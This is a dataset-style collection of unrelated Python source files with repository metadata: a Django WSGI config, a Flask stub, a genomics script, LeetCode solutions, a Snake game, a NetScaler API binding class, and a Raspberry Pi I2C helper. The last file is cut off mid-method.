| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
"""
WSGI config for cool_django project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cool_django.settings")
application = get_wsgi_application()
|
[
"minar09.bd@gmail.com"
] |
minar09.bd@gmail.com
|
38e603282b78b3b541f33eda526c3cda85a1015a
|
765ac31545ea443f406493615603dd973b6a27f1
|
/pycode/restSrv.py
|
73e8611448f9ad4ac08de07c7dffd86087aab9c4
|
[] |
no_license
|
aleksandarkovacevic30/smv-blueprint
|
6ffbc370bc20228e8eab9640871b2e9b41a7859f
|
22dc97a26161928a031889a06ada6bc900249e74
|
refs/heads/master
| 2022-08-22T08:22:49.459038
| 2020-01-17T10:45:35
| 2020-01-17T10:45:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
from flask import Flask, json
from flask import request
import random
states = ["DEVICE_INACTIVE_STATE","DEVICE_ACTIVE_STATE","DEVICE_ERROR_STATE"]
api = Flask(__name__)
@api.route('/api/device/status', methods=['POST'])
def post_device_status():
if not request.json:
abort(400)
print(request.json)
response={"state":random.choice(states),"config":{"ska":"3600"}}
return json.dumps(response,sort_keys=False)
if __name__ == '__main__':
api.run()
|
[
"akovacev@intersystems.com"
] |
akovacev@intersystems.com
|
7edfcbe3571033cb681c2f534078ce61f178fea9
|
f7ec5c267111ffee58711586471d602c45166d0b
|
/FreqSeek.py
|
89501e73ef1aaef966761340f19defef72ce43fd
|
[] |
no_license
|
ManeshNarayan/GenomeAnalysis
|
6bbc8c4d297b26643f94f3d438372d13401c4f90
|
3b76bc2d2247469e1c7b0c7ba8cc8bc335effb43
|
refs/heads/master
| 2021-01-01T03:50:35.988683
| 2016-11-08T19:30:59
| 2016-11-08T19:30:59
| 57,366,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,633
|
py
|
import itertools
import os,sys
import xlsxwriter
from multiprocessing import Pool
def spacerCountWrite(motif1,motif2):
Files = [open("gen.txt","w")]*30
workbook = xlsxwriter.Workbook(motif1+"-"+motif2+"/"+motif1+"-"+motif2+".xlsx")
worksheet = workbook.add_worksheet()
worksheet.write(0, 1, "A")
worksheet.write(0, 2, "T")
worksheet.write(0, 3, "G")
worksheet.write(0, 4, "C")
for i in range(1,31):
CntA = 0
CntT = 0
CntG = 0
CntC = 0
Files[i-1] = open(motif1+"-"+motif2+"/"+"spacer"+str(i)+".txt","r")
for String in Files[i-1].readlines():
CntA+=String.count("a")
CntT+=String.count("t")
CntG+=String.count("g")
CntC+=String.count("c")
worksheet.write(i, 1, CntA)
worksheet.write(i, 2, CntT)
worksheet.write(i, 3, CntG)
worksheet.write(i, 4, CntC)
Files[i-1].close()
workbook.close()
def func_star(a_b):
"""Convert `f([1,2])` to `f(1,2)` call."""
return spacerCountWrite(*a_b)
pool = Pool(8)
#motifs = ["tgtcaa","tgtcac","tgtcag","tgtcat","tgtcca","tgtccc","tgtccg","tgtcct","tgtcga","tgtcgc","tgtcgg","tgtcgt","tgtcta","tgtctc","tgtctg","tgtctt"]
motifs1 = ["tgtcaa"]*16+["tgtcac"]*16+["tgtcag"]*16+["tgtcat"]*16+["tgtcca"]*16+["tgtccc"]*16+["tgtccg"]*16+["tgtcct"]*16+["tgtcga"]*16+["tgtcgc"]*16+["tgtcgg"]*16+["tgtcgt"]*16+["tgtcta"]*16+["tgtctc"]*16+["tgtctg"]*16+["tgtctt"]*16
motifs2 = ["tgtcaa","tgtcac","tgtcag","tgtcat","tgtcca","tgtccc","tgtccg","tgtcct","tgtcga","tgtcgc","tgtcgg","tgtcgt","tgtcta","tgtctc","tgtctg","tgtctt"]*16
pool.map(func_star, itertools.izip(motifs1, motifs2))
|
[
"noreply@github.com"
] |
ManeshNarayan.noreply@github.com
|
0d4fd0289193ebb58c6326e031b53ce58d6882c1
|
34ce81ba8764f3c5ac14ab8194bd40ba4039d368
|
/LeetCode/85_maximalRectangle.py
|
7b348c1afb9cf342889ea38b50b55e9b91bb1ece
|
[] |
no_license
|
Una-zh/algorithms
|
b06a7292da7ce914795fdd14c0e9332aa74d5e65
|
24cf4bb2496c4901aa000ff692a58396ff45589a
|
refs/heads/master
| 2020-07-24T18:23:57.073470
| 2019-09-12T13:56:48
| 2019-09-12T13:56:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,487
|
py
|
# -- coding: utf-8 --
# author: una
# datetime: 2019-08-15 15:55
from typing import List
class Solution:
def maximalRectangle(self, matrix: List[List[str]]) -> int:
if not matrix or not matrix[0]:
return 0
def largestRectangleArea(heights):
if not heights:
return 0
stack = list([-1])
area = 0
for i in range(len(heights)):
if stack[-1] == -1 or heights[stack[-1]] <= heights[i]:
stack.append(i)
else:
while stack[-1] > -1 and heights[stack[-1]] > heights[i]:
tmp_h = heights[stack.pop()]
area = max(area, tmp_h * (i - stack[-1] - 1))
stack.append(i)
i += 1
while stack[-1] > -1:
tmp_h = heights[stack.pop()]
area = max(area, tmp_h * (i - stack[-1] - 1))
return area
heights = list(map(int, matrix[0]))
final_res = largestRectangleArea(heights)
for i in range(1, len(matrix)):
heights = [heights[j] + 1 if matrix[i][j] == '1' else 0 for j in range(len(matrix[i]))]
final_res = max(final_res, largestRectangleArea(heights))
return final_res
if __name__ == '__main__':
a = [
["1","0","1","0","0"],
["1","0","1","1","1"],
["1","1","1","1","1"],
["1","0","0","1","0"]
]
print(Solution().maximalRectangle(a))
|
[
"994521950@qq.com"
] |
994521950@qq.com
|
5c6a74ca2440defc0e3aa24f241551b7899aec5a
|
c2af84d93b1c160ab90a580949247eeb9f0f6bc3
|
/src/game.py
|
67c0f9bf5fcc4e139debccf8bebdc6bb4e5dcbae
|
[] |
no_license
|
jhnkim23/SnakeAI
|
06bff316a91d88d090e6f1a3c0a6f013ee00fe34
|
e21603934c8b507d8d182e3549a2ed1f23b6598a
|
refs/heads/master
| 2023-08-17T00:10:08.474112
| 2023-08-13T17:46:56
| 2023-08-13T17:46:56
| 285,366,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,323
|
py
|
import pygame
import random
NORTH = 1
EAST = 2
SOUTH = 3
WEST = 4
cols, rows = (15, 15)
block_size = 30
snake = [(0, 2), (0, 1), (0, 0)]
prev_direction = SOUTH
direction = SOUTH
food = (random.randint(0, cols-1), random.randint(0, rows-1))
while food in snake:
food = (random.randint(0, cols-1), random.randint(0, rows-1))
score = 0
snake_grow = False
pygame.init()
pygame.display.set_caption('Snake (Score: 0)')
screen = pygame.display.set_mode(((block_size + 2) * cols, (block_size + 2) * rows))
def is_dead():
#Left, Right, Top, Bottom collision
if snake[0][0] < 0 or snake[0][0] > cols-1 or snake[0][1] < 0 or snake[0][1] > rows-1:
return True
#Body collision
for i in range(1, len(snake) - 1):
if (snake[0][0] == snake[i][0]) and (snake[0][1] == snake[i][1]):
return True
return False
def draw_rect(color, row, col):
pygame.draw.rect(screen, color, (row*(block_size+2)+1, col*(block_size+2)+1, block_size, block_size))
done = False
while not done:
pygame.time.delay(100)
pygame.display.set_caption("Snake (Score: " + str(score) + ")")
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP and prev_direction != SOUTH:
direction = NORTH
elif event.key == pygame.K_DOWN and prev_direction != NORTH:
direction = SOUTH
elif event.key == pygame.K_LEFT and prev_direction != EAST:
direction = WEST
elif event.key == pygame.K_RIGHT and prev_direction != WEST:
direction = EAST
screen.fill((30, 30, 30))
pygame.display.flip()
# Move snake body
# Iterate through snake backwards, excluding the head
if snake_grow:
snake.append((-1, -1))
snake_grow = False
for i in range(len(snake) - 1, 0, -1):
snake[i] = snake[i - 1]
prev_direction = direction
# Move snake head
head = snake[0]
if direction == NORTH:
snake[0] = (head[0], head[1] - 1)
elif direction == SOUTH:
snake[0] = (head[0], head[1] + 1)
elif direction == WEST:
snake[0] = (head[0] - 1, head[1])
elif direction == EAST:
snake[0] = (head[0] + 1, head[1])
#Check death collisions
if is_dead():
done = True
#Check food collision
if snake[0][0] == food[0] and snake[0][1] == food[1]:
score += 1
food = (random.randint(0, cols-1), random.randint(0, rows-1))
while food in snake:
food = (random.randint(0, cols-1), random.randint(0, rows-1))
snake_grow = True
#Iterate for Empty Set then Random on Set
#Make ALl points set randomize then check (Remove if part of snake)
#Make ALL points set then iterate through snake and remove points on snake
# Draw the board
for r in range(rows):
for c in range(cols):
draw_rect((10, 10, 10), r, c)
# Draw the Snake over board
for i in range(len(snake)):
draw_rect((0, 255, 0), snake[i][0], snake[i][1])
# Draw the food over board
draw_rect((255, 0, 0), food[0], food[1])
# So we don't show snake out of board
if not done:
pygame.display.update()
pygame.quit()
|
[
"junholee6a@gmail.com"
] |
junholee6a@gmail.com
|
c21baec84c2ca56107d83dc562391ea5f739d031
|
24e321fb4b36af3cf38090e6a1c3ded8c4d2c678
|
/grammar-basic/Day40/5_3.2.py
|
6716bfc833763dea2344197696cbd39e8d1b8493
|
[] |
no_license
|
zhent1106/python-learning
|
027635b23bfa36074fa3683e6db98cfe8446def2
|
06302db66fc9a3aeb57528aa921baa9849219857
|
refs/heads/master
| 2021-04-17T16:37:54.351257
| 2020-06-06T05:05:22
| 2020-06-06T05:05:22
| 249,459,773
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
"""
元组是不可变的,所以没用插入和删除方法
"""
from numpy import random
a = () # 空元组对象
b = (1, 'xiaoming', 29.5, '17312662388')
c = ('001', '2020-05-04', ['三文鱼', '电烤箱'])
# 从[1,5)区间内随机选择 10 个数
a = random.randint(1, 5, 10)
print(a)
at = tuple(a)
print(at)
# 统计 3 出现次数
at.count(3)
print(at.count(3))
|
[
"1299088269@qq.com"
] |
1299088269@qq.com
|
91724e3cf1d2a293e5ba66f794160dbad8996b76
|
e4c3653fe09b0ac6e4f8450be111a7988ac5b405
|
/data/small.py
|
39c06c88beede54e41f865fea2b4bedbb8bad99b
|
[] |
no_license
|
Maronato/NGP
|
75a8ca7b80df1e9b37b497f04189cc18e93bc2a0
|
3fd2c3c3eb77fe081e9a262224f420f79cbe09cf
|
refs/heads/master
| 2020-07-06T00:51:34.072938
| 2017-04-21T23:53:53
| 2017-04-21T23:53:53
| 73,972,542
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
X = [
[5, 3, 0, 1],
[4, 0, 0, 1],
[1, 1, 0, 5],
[1, 0, 0, 4],
[0, 1, 5, 4],
]
def load():
return X
|
[
"gustavomaronato@gmail.com"
] |
gustavomaronato@gmail.com
|
a1aab4298b55a5e3cb7d2463a99b436ac2d74f5a
|
c78e67c6eb74e505fbcbbb38d2f7c17daaf72b60
|
/leetcode/609. Find Duplicate File in System.py
|
0b99a10cbb5474d3d2aed453ffc7df556bd8a429
|
[] |
no_license
|
CapSOSkw/My_leetcode
|
8af706066a464ebeb91888048ee296e8c5f4d195
|
32c37aee41e6fdd5b95f639239b9d72d22d7541c
|
refs/heads/master
| 2021-07-10T02:35:36.501353
| 2020-07-01T12:40:43
| 2020-07-01T12:40:43
| 141,933,204
| 0
| 1
| null | 2018-09-26T00:57:35
| 2018-07-22T21:51:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,823
|
py
|
'''
Given a list of directory info including directory path, and all the files with contents in this directory,
you need to find out all the groups of duplicate files in the file system in terms of their paths.
A group of duplicate files consists of at least two files that have exactly the same content.
A single directory info string in the input list has the following format:
"root/d1/d2/.../dm f1.txt(f1_content) f2.txt(f2_content) ... fn.txt(fn_content)"
It means there are n files
(f1.txt, f2.txt ... fn.txt with content f1_content, f2_content ... fn_content, respectively)
in directory root/d1/d2/.../dm. Note that n >= 1 and m >= 0. If m = 0,
it means the directory is just the root directory.
The output is a list of group of duplicate file paths.
For each group, it contains all the file paths of the files that have the same content.
A file path is a string that has the following format:
"directory_path/file_name.txt"
Example 1:
Input:
["root/a 1.txt(abcd) 2.txt(efgh)", "root/c 3.txt(abcd)", "root/c/d 4.txt(efgh)", "root 4.txt(efgh)"]
Output:
[["root/a/2.txt","root/c/d/4.txt","root/4.txt"],["root/a/1.txt","root/c/3.txt"]]
Note:
No order is required for the final output.
You may assume the directory name, file name and file content only has letters and digits,
and the length of file content is in the range of [1,50].
The number of files given is in the range of [1,20000].
You may assume no files or directories share the same name in the same directory.
You may assume each given directory info represents a unique directory.
Directory path and file info are separated by a single blank space.
Follow-up beyond contest:
Imagine you are given a real file system, how will you search files? DFS or BFS?
If the file content is very large (GB level), how will you modify your solution?
If you can only read the file by 1kb each time, how will you modify your solution?
What is the time complexity of your modified solution? What is the most time-consuming part and memory consuming part of it? How to optimize?
How to make sure the duplicated files you find are not false positive?
'''
import re
from collections import defaultdict
class Solution:
def findDuplicate(self, paths):
"""
:type paths: List[str]
:rtype: List[List[str]]
"""
my_dict = defaultdict(list)
for path in paths:
root, *file = path.split(" ")
for f in file:
txt, content = f.split('(')
my_dict[content].append(root+'/'+txt)
print(root+'/'+txt)
x = [my_dict[key] for key in my_dict if len(my_dict[key]) > 1]
print(x)
return x
s = Solution()
x = ["root/a 1.txt(abcd) 2.txt(efgh)", "root/c 3.txt(abcd)", "root/c/d 4.txt(efgh)", "root 4.txt(efgh)"]
s.findDuplicate(x)
|
[
"wky0702@gmail.com"
] |
wky0702@gmail.com
|
583352fdd34769d14f54b7a5a431215c19c362da
|
baf90325a6f0b0633895dcd184c4c5c088531ee6
|
/models/__init__.py
|
eb0d3517bc14316b026b51c0e341bfcb52d30895
|
[
"MIT"
] |
permissive
|
wo984c/multi-user-blog
|
7b78fd5d029d7ea1825c3283cd6f6de9912701df
|
15bff1eee6d13b97ab4b526f7bf5eb383fc4a788
|
refs/heads/master
| 2020-03-20T16:48:12.439013
| 2018-09-08T18:15:36
| 2018-09-08T18:15:36
| 137,546,033
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
# Python will know that this directory is a Python package directory
# other than an ordinary directory
|
[
"williamortiz@Williams-MacBook-Pro.local"
] |
williamortiz@Williams-MacBook-Pro.local
|
7e7beb1ec8cd79af6e18720e40d20054f6e8dfb1
|
ba83e0c274597cab7c5ca3f089f6a2b841cd2820
|
/Authorize/apps.py
|
2280c85d0fc3e4429f0d516a55fc910c9fdbffdc
|
[] |
no_license
|
u1456168/random
|
814fbabbd200022548e8c9d9c2fe59bb238ffe83
|
1b9984ff47bcfb9a70c5127e01135c3a2f22ab49
|
refs/heads/master
| 2021-01-06T03:57:46.252360
| 2017-05-08T19:12:44
| 2017-05-08T19:12:44
| 90,662,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from django.apps import AppConfig
class AuthorizeConfig(AppConfig):
name = 'Authorize'
|
[
"noreply@github.com"
] |
u1456168.noreply@github.com
|
ae32b4f702bc089d454ca0abbbde7f6fcdb4e387
|
ba3231b25c60b73ca504cd788efa40d92cf9c037
|
/nitro-python-13.0.36/nssrc/com/citrix/netscaler/nitro/resource/config/basic/servicegroup_lbmonitor_binding.py
|
66fe42dff6c016224ea1e6bca3ab49cdf79478be
|
[
"Apache-2.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
zhuweigh/vpx13
|
f6d559ae85341e56472e3592cbc67062dac34b93
|
b36caa3729d3ca5515fa725f2d91aeaabdb2daa9
|
refs/heads/master
| 2020-07-04T22:15:16.595728
| 2019-09-20T00:19:56
| 2019-09-20T00:19:56
| 202,435,307
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,641
|
py
|
#
# Copyright (c) 2008-2019 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class servicegroup_lbmonitor_binding(base_resource) :
""" Binding class showing the lbmonitor that can be bound to servicegroup.
"""
def __init__(self) :
self._monitor_name = None
self._monweight = None
self._monstate = None
self._weight = None
self._passive = None
self._servicegroupname = None
self._port = None
self._customserverid = None
self._serverid = None
self._state = None
self._hashid = None
self._nameserver = None
self._dbsttl = None
self.___count = None
@property
def servicegroupname(self) :
r"""Name of the service group.<br/>Minimum length = 1.
"""
try :
return self._servicegroupname
except Exception as e:
raise e
@servicegroupname.setter
def servicegroupname(self, servicegroupname) :
r"""Name of the service group.<br/>Minimum length = 1
"""
try :
self._servicegroupname = servicegroupname
except Exception as e:
raise e
@property
def port(self) :
r"""Port number of the service. Each service must have a unique port number.<br/>Range 1 - 65535<br/>* in CLI is represented as 65535 in NITRO API.
"""
try :
return self._port
except Exception as e:
raise e
@port.setter
def port(self, port) :
r"""Port number of the service. Each service must have a unique port number.<br/>Range 1 - 65535<br/>* in CLI is represented as 65535 in NITRO API
"""
try :
self._port = port
except Exception as e:
raise e
@property
def nameserver(self) :
r"""Specify the nameserver to which the query for bound domain needs to be sent. If not specified, use the global nameserver.
"""
try :
return self._nameserver
except Exception as e:
raise e
@nameserver.setter
def nameserver(self, nameserver) :
r"""Specify the nameserver to which the query for bound domain needs to be sent. If not specified, use the global nameserver.
"""
try :
self._nameserver = nameserver
except Exception as e:
raise e
@property
def state(self) :
r"""Initial state of the service after binding.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._state
except Exception as e:
raise e
@state.setter
def state(self, state) :
r"""Initial state of the service after binding.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._state = state
except Exception as e:
raise e
@property
def hashid(self) :
r"""Unique numerical identifier used by hash based load balancing methods to identify a service.<br/>Minimum value = 1.
"""
try :
return self._hashid
except Exception as e:
raise e
@hashid.setter
def hashid(self, hashid) :
r"""Unique numerical identifier used by hash based load balancing methods to identify a service.<br/>Minimum value = 1
"""
try :
self._hashid = hashid
except Exception as e:
raise e
@property
def serverid(self) :
r"""The identifier for the service. This is used when the persistency type is set to Custom Server ID.
"""
try :
return self._serverid
except Exception as e:
raise e
@serverid.setter
def serverid(self, serverid) :
r"""The identifier for the service. This is used when the persistency type is set to Custom Server ID.
"""
try :
self._serverid = serverid
except Exception as e:
raise e
@property
def customserverid(self) :
r"""Unique service identifier. Used when the persistency type for the virtual server is set to Custom Server ID.<br/>Default value: "None".
"""
try :
return self._customserverid
except Exception as e:
raise e
@customserverid.setter
def customserverid(self, customserverid) :
r"""Unique service identifier. Used when the persistency type for the virtual server is set to Custom Server ID.<br/>Default value: "None"
"""
try :
self._customserverid = customserverid
except Exception as e:
raise e
@property
def weight(self) :
r"""Weight to assign to the servers in the service group. Specifies the capacity of the servers relative to the other servers in the load balancing configuration. The higher the weight, the higher the percentage of requests sent to the service.<br/>Minimum value = 1<br/>Maximum value = 100.
"""
try :
return self._weight
except Exception as e:
raise e
@weight.setter
def weight(self, weight) :
r"""Weight to assign to the servers in the service group. Specifies the capacity of the servers relative to the other servers in the load balancing configuration. The higher the weight, the higher the percentage of requests sent to the service.<br/>Minimum value = 1<br/>Maximum value = 100
"""
try :
self._weight = weight
except Exception as e:
raise e
@property
def monitor_name(self) :
r"""Monitor name.
"""
try :
return self._monitor_name
except Exception as e:
raise e
@monitor_name.setter
def monitor_name(self, monitor_name) :
r"""Monitor name.
"""
try :
self._monitor_name = monitor_name
except Exception as e:
raise e
@property
def dbsttl(self) :
r"""Specify the TTL for DNS record for domain based service.The default value of ttl is 0 which indicates to use the TTL received in DNS response for monitors.<br/>Default value: 0.
"""
try :
return self._dbsttl
except Exception as e:
raise e
@dbsttl.setter
def dbsttl(self, dbsttl) :
r"""Specify the TTL for DNS record for domain based service.The default value of ttl is 0 which indicates to use the TTL received in DNS response for monitors.<br/>Default value: 0
"""
try :
self._dbsttl = dbsttl
except Exception as e:
raise e
@property
def passive(self) :
r"""Indicates if load monitor is passive. A passive load monitor does not remove service from LB decision when threshold is breached.
"""
try :
return self._passive
except Exception as e:
raise e
@passive.setter
def passive(self, passive) :
r"""Indicates if load monitor is passive. A passive load monitor does not remove service from LB decision when threshold is breached.
"""
try :
self._passive = passive
except Exception as e:
raise e
@property
def monstate(self) :
r"""Monitor state.<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._monstate
except Exception as e:
raise e
@monstate.setter
def monstate(self, monstate) :
r"""Monitor state.<br/>Possible values = ENABLED, DISABLED
"""
try :
self._monstate = monstate
except Exception as e:
raise e
@property
def monweight(self) :
r"""weight of the monitor that is bound to servicegroup.
"""
try :
return self._monweight
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(servicegroup_lbmonitor_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.servicegroup_lbmonitor_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.servicegroupname is not None :
return str(self.servicegroupname)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = servicegroup_lbmonitor_binding()
updateresource.servicegroupname = resource.servicegroupname
updateresource.port = resource.port
updateresource.monitor_name = resource.monitor_name
updateresource.monstate = resource.monstate
updateresource.passive = resource.passive
updateresource.weight = resource.weight
updateresource.customserverid = resource.customserverid
updateresource.serverid = resource.serverid
updateresource.state = resource.state
updateresource.hashid = resource.hashid
updateresource.nameserver = resource.nameserver
updateresource.dbsttl = resource.dbsttl
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [servicegroup_lbmonitor_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].servicegroupname = resource[i].servicegroupname
updateresources[i].port = resource[i].port
updateresources[i].monitor_name = resource[i].monitor_name
updateresources[i].monstate = resource[i].monstate
updateresources[i].passive = resource[i].passive
updateresources[i].weight = resource[i].weight
updateresources[i].customserverid = resource[i].customserverid
updateresources[i].serverid = resource[i].serverid
updateresources[i].state = resource[i].state
updateresources[i].hashid = resource[i].hashid
updateresources[i].nameserver = resource[i].nameserver
updateresources[i].dbsttl = resource[i].dbsttl
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = servicegroup_lbmonitor_binding()
deleteresource.servicegroupname = resource.servicegroupname
deleteresource.port = resource.port
deleteresource.monitor_name = resource.monitor_name
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [servicegroup_lbmonitor_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].servicegroupname = resource[i].servicegroupname
deleteresources[i].port = resource[i].port
deleteresources[i].monitor_name = resource[i].monitor_name
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, servicegroupname="", option_="") :
r""" Use this API to fetch servicegroup_lbmonitor_binding resources.
"""
try :
if not servicegroupname :
obj = servicegroup_lbmonitor_binding()
response = obj.get_resources(service, option_)
else :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, servicegroupname, filter_) :
r""" Use this API to fetch filtered set of servicegroup_lbmonitor_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, servicegroupname) :
r""" Use this API to count servicegroup_lbmonitor_binding resources configued on NetScaler.
"""
try :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, servicegroupname, filter_) :
r""" Use this API to count the filtered set of servicegroup_lbmonitor_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class State:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Monstate:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class servicegroup_lbmonitor_binding_response(base_response) :
def __init__(self, length=1) :
self.servicegroup_lbmonitor_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.servicegroup_lbmonitor_binding = [servicegroup_lbmonitor_binding() for _ in range(length)]
|
[
"zhuwei@xsky.com"
] |
zhuwei@xsky.com
|
910cf1056b16c60ffd537ab2d22a1b09f7182cc2
|
d8f5a5f3a8b597765df1fcaaf112b9d5eaa3ae2c
|
/Raspi_I2C.py
|
c5d1d77e3805ed34f16ccb5ae13679ee3bdfd038
|
[] |
no_license
|
andy-pi/berrybot
|
427174478ab2280451251d937160ea34091c5a30
|
c05f05394090eb51d54124d403ac5dc7f790d775
|
refs/heads/master
| 2021-01-01T03:44:05.094852
| 2016-05-19T23:31:34
| 2016-05-19T23:31:34
| 58,291,070
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,505
|
py
|
#!/usr/bin/python
# by UKonline2000
import re
import smbus
# ===========================================================================
# Raspi_I2C Class
# ===========================================================================
class Raspi_I2C(object):
@staticmethod
def getPiRevision():
"Gets the version number of the Raspberry Pi board"
# Revision list available at: http://elinux.org/RPi_HardwareHistory#Board_Revision_History
try:
with open('/proc/cpuinfo', 'r') as infile:
for line in infile:
# Match a line of the form "Revision : 0002" while ignoring extra
# info in front of the revsion (like 1000 when the Pi was over-volted).
match = re.match('Revision\s+:\s+.*(\w{4})$', line)
if match and match.group(1) in ['0000', '0002', '0003']:
# Return revision 1 if revision ends with 0000, 0002 or 0003.
return 1
elif match:
# Assume revision 2 if revision ends with any other 4 chars.
return 2
# Couldn't find the revision, assume revision 0 like older code for compatibility.
return 0
except:
return 0
@staticmethod
def getPiI2CBusNumber():
# Gets the I2C bus number /dev/i2c#
return 1 if Raspi_I2C.getPiRevision() > 1 else 0
def __init__(self, address, busnum=-1, debug=False):
self.address = address
# By default, the correct I2C bus is auto-detected using /proc/cpuinfo
# Alternatively, you can hard-code the bus version below:
# self.bus = smbus.SMBus(0); # Force I2C0 (early 256MB Pi's)
# self.bus = smbus.SMBus(1); # Force I2C1 (512MB Pi's)
self.bus = smbus.SMBus(busnum if busnum >= 0 else Raspi_I2C.getPiI2CBusNumber())
self.debug = debug
def reverseByteOrder(self, data):
"Reverses the byte order of an int (16-bit) or long (32-bit) value"
# Courtesy Vishal Sapre
byteCount = len(hex(data)[2:].replace('L','')[::2])
val = 0
for i in range(byteCount):
val = (val << 8) | (data & 0xff)
data >>= 8
return val
def errMsg(self):
print "Error accessing 0x%02X: Check your I2C address" % self.address
return -1
def write8(self, reg, value):
"Writes an 8-bit value to the specified register/address"
try:
self.bus.write_byte_data(self.address, reg, value)
if self.debug:
print "I2C: Wrote 0x%02X to register 0x%02X" % (value, reg)
except IOError, err:
return self.errMsg()
def write16(self, reg, value):
"Writes a 16-bit value to the specified register/address pair"
try:
self.bus.write_word_data(self.address, reg, value)
if self.debug:
print ("I2C: Wrote 0x%02X to register pair 0x%02X,0x%02X" %
(value, reg, reg+1))
except IOError, err:
return self.errMsg()
def writeRaw8(self, value):
"Writes an 8-bit value on the bus"
try:
self.bus.write_byte(self.address, value)
if self.debug:
print "I2C: Wrote 0x%02X" % value
except IOError, err:
return self.errMsg()
def writeList(self, reg, list):
"Writes an array of bytes using I2C format"
try:
if self.debug:
print "I2C: Writing list to register 0x%02X:" % reg
print list
self.bus.write_i2c_block_data(self.address, reg, list)
except IOError, err:
return self.errMsg()
def readList(self, reg, length):
"Read a list of bytes from the I2C device"
try:
results = self.bus.read_i2c_block_data(self.address, reg, length)
if self.debug:
print ("I2C: Device 0x%02X returned the following from reg 0x%02X" %
(self.address, reg))
print results
return results
except IOError, err:
return self.errMsg()
def readU8(self, reg):
"Read an unsigned byte from the I2C device"
try:
result = self.bus.read_byte_data(self.address, reg)
if self.debug:
print ("I2C: Device 0x%02X returned 0x%02X from reg 0x%02X" %
(self.address, result & 0xFF, reg))
return result
except IOError, err:
return self.errMsg()
def readS8(self, reg):
"Reads a signed byte from the I2C device"
try:
result = self.bus.read_byte_data(self.address, reg)
if result > 127: result -= 256
if self.debug:
print ("I2C: Device 0x%02X returned 0x%02X from reg 0x%02X" %
(self.address, result & 0xFF, reg))
return result
except IOError, err:
return self.errMsg()
def readU16(self, reg, little_endian=True):
"Reads an unsigned 16-bit value from the I2C device"
try:
